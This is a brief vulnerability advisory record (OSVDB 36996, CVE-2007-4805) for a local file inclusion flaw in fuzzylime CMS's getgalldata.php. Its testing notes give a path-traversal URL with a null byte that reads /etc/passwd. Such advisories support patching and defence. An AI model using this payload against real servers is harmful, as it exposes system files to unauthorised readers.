fuzzylime (cms) code/getgalldata.php p Variable Traversal Local File Inclusion

2007-09-08T00:00:00
ID OSVDB:36996
Type osvdb
Reporter OSVDB
Modified 2007-09-08T00:00:00

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Manual Testing Notes

http://[target]/[fuzzylime]/code/getgalldata.php/../../../../../../../../etc/passwd%00

References:

Secunia Advisory ID:26740 Other Advisory URL: http://milw0rm.com/exploits/4378 Mail List Post: http://www.attrition.org/pipermail/vim/2007-September/001780.html CVE-2007-4805 Bugtraq ID: 25604